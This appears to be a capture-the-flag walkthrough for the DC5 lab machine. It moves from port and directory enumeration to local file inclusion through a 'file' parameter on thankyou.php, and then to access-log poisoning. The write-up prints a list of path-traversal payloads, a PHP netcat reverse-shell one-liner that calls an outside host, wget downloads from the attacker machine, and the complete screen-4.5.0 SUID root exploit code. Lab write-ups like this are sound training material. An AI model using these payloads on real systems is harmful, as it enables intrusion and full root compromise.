DC5

Nmap

sudo nmap 192.168.184.26 -p- -sS -sV

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
111/tcp   open  rpcbind 2-4 (RPC #100000)
38106/tcp open  status  1 (RPC #100024)

Port 80 on the target machine take us to the following web page. Multiple sub pages include non-english text and after translating random paragraphs found this is mostly gibberish.

Clicking the home button takes us to the same page but we notice this time we are on /index.php. I then ran feroxbuster against the target site to identify more pages.

feroxbuster --url http://192.168.184.26 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt -s 200,300,301 -x php 

Checking out contact.php and it appears to be the only page to take some form of input.

After submitting some test information we are directed to /thankyou.php where the URL contains our input from the previous page.

At this point I decided to test thankyou.php? for command injection. I caught the request in Burpsuite and sent it to intruder. I then set the payload variable as below.

I then added the command injection list as shown below as the payload.

cmd=../../../../../etc/passwd
?exec=../../../../../etc/passwd
?command=../../../../../etc/passwd
?execute../../../../../etc/passwd
?ping=../../../../../etc/passwd
?query=../../../../../etc/passwd
?jump=../../../../../etc/passwd
?code=../../../../../etc/passwd
?reg=../../../../../etc/passwd
?do=../../../../../etc/passwd
?func=../../../../../etc/passwd
?arg=../../../../../etc/passwd
?option=../../../../../etc/passwd
?load=../../../../../etc/passwd
?process=../../../../../etc/passwd
?step=../../../../../etc/passwd
?read=../../../../../etc/passwd
?function=../../../../../etc/passwd
?req=../../../../../etc/passwd
?feature=../../../../../etc/passwd
?exe=../../../../../etc/passwd
?module=../../../../../etc/passwd
?payload=../../../../../etc/passwd
?run=../../../../../etc/passwd
?print=../../../../../etc/passwd
?file=../../../../../etc/passwd

Ensure URL encoding is turned off as this was causing incorrect results as it was encoding '?'.

Viewing the results of the payload after show that the ?file= parameter appears to be vulnerable due to the content length being greatly different form the other values.

Viewing this in the browser shows us valid results.

We can fuzz for further files using wfuzz and the command below:

wfuzz -c -w lfi.txt --hl 42 http://192.168.184.26/thankyou.php?file=../../../../../../../FUZZ

The LFI list can be downloaded from here

29KB

lfi.txt

We have two interesting LFI paths found once wfuzz completes:

/var/log/nginx/access.log
/var/log/nginx/error.log

Checking out access.log we can see requests we have made.

We can capture a request in Burpsuite and inject a PHP reverse shell into the User-Agent field. When the code is injected into the log we are able to get a reverse shell.

Where the code snippet below is used for the RCE:

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.211 80 >/tmp/f') ?>

With a netcat listener listening we can then access the log files again at: http://192.168.211.26/thankyou.php?file=../../../../../../../var/log/nginx/access.log

When we attempt to load the log files the page should hang and we get a reverse shell.

Searching for SUID commands on the machine find the binary screen-4.5.0 has the SUID bit set.

find / -perm -u=s -type f 2>/dev/null 

Researching on Google shows a local privilege escalation exploit for this binary version.

exploits/screen2root at master · XiphosResearch/exploitsGitHub

We first need to create some files and break down the script to get this to work. Follow the instructions below to achieve shell.

libhax.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

Compile libhax.c

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

rootshell.c

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

Compile rootshell.c

gcc -o /tmp/rootshell /tmp/rootshell.c** **

Create exploit bash script.

exploit.sh

#!/bin/bash

cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
echo "[+] Triggering..."
screen -ls 

Upload compiled files to target machine.

wget http://192.168.49.211/rootshell
wget http://192.168.49.211/libhax.so
wget http://192.168.49.211/exploit.sh

Once uploaded make the bash script executable:

chmod +x exploit.sh

Execute exploit.sh then after run /tmp/rootshell to gain shell as root.